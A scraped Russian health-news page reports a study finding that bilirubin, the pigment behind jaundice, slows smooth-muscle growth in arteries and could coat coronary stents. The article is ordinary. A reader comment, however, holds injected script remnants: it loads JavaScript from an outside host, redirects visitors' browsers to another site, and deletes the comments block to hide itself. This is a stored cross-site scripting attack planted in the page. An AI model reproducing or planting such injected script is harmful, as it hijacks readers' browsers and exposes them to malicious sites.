Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пигмент, который вызывает...  >>  Пигмент, который вызывает желтуху, защищает от инфаркта
 
Обратная связь
 

Пигмент, который вызывает желтуху, защищает от инфаркта

Размер шрифта
14 февраля 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые сделали удивительное открытие: билирубин препятствует развитию инфаркта миокарда.

пигмент, вызывающий желтузу, защитит от инфаркта

Билирубин представляет собой пигмент, который образуется при разрушении эритроцитов, проходит цикл превращений в печени и выводится из организма с калом и мочой. Накопление билирубина, обусловленное различными причинами (избыточным разрушением эритроцитов, нарушением функции печени или прекращением поступления желчи в кишечник), приводит к развитию желтухи и пожелтению кожных покровов.

«Билирубин ежедневно образуется в нашем организме и выполняет важные функции, в том числе он является антиоксидантом. Нам удалось обнаружить, что билирубин предотвращает или уменьшает повреждение кровеносных сосудов при атеросклерозе», – рассказывает один из авторов исследования Уильям Дюрант.

Повреждение внутреннего слоя артерий ведет к разрастанию гладкомышечных клеток, что может привести к образованию тромбов в коронарных артериях и инфаркту миокарда. Билирубин подавляет рост гладкомышечных клеток, не вызывая их гибели. Однако проблема использования билирубина состоит в том, что он плохо растворим в воде и быстро метаболизируется в печени при пероральном применении.

Для того чтобы избежать этих недостатков, билирубин можно использовать в качестве покрытия для стентов, которые устанавливают в коронарные сосуды. Билирубин будет препятствовать разрастанию гладкомышечных клеток и закупорке стента.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Шоколадка в день спасет от инфаркта   Как угробить свое сердце?!   Ешь фаст фуд, не моешь рот – будет инфаркт!   6 признаков, что ваше сердце вот-вот откажет  
13 февраля 2013Пигмент, который вызывает желтуху, защищает от инфаркта 22 июня 2013Грецкие орехи спасут от инфаркта
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Болезни, которые превратят вашу кожу в кошмар!
Перекусы, которые спасут ваше сердце
6 суперпродуктов от диабета

Тесты

Будет ли у вас инфаркт?
Грозит ли вам инфаркт миокарда?
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.